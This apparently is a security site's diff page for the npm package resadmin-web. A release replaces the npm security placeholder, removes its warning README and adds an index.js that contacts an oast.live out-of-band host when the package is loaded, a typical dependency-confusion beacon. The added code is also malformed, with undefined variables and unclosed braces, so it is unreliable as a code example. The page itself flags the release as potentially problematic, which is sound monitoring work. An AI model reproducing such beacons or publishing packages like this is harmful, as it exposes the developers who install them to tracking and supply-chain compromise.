resadmin-web 0.0.1-security → 11.0.1

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of resadmin-web might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/README.md +1 -5
  2. package/index.js +9 -0
  3. package/package.json +11 -3
package/README.md CHANGED
@@ -1,5 +1 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=resadmin-web for more information.
1
+ niubiplus
package/index.js ADDED
@@ -0,0 +1,9 @@
1
+ const https = require("http");
2
+ https.get("http://nodejsrce.ca0vc681uiiui8rpovegcky9cgoyyyyyn.oast.live/test", resp => {
3
+ data += chunk;
4
+ });
5
+ resp.on("error", err => {
6
+ console.log(err.message);
7
+ });
8
+
9
+
package/package.json CHANGED
@@ -1,6 +1,14 @@
1
1
  {
2
2
  "name": "resadmin-web",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "11.0.1",
4
+ "description": "resadmin-web",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1"
8
+ },
9
+ "keywords": [
10
+ "resadmin-web"
11
+ ],
12
+ "author": "resadmin-web",
13
+ "license": "ISC"
6
14
  }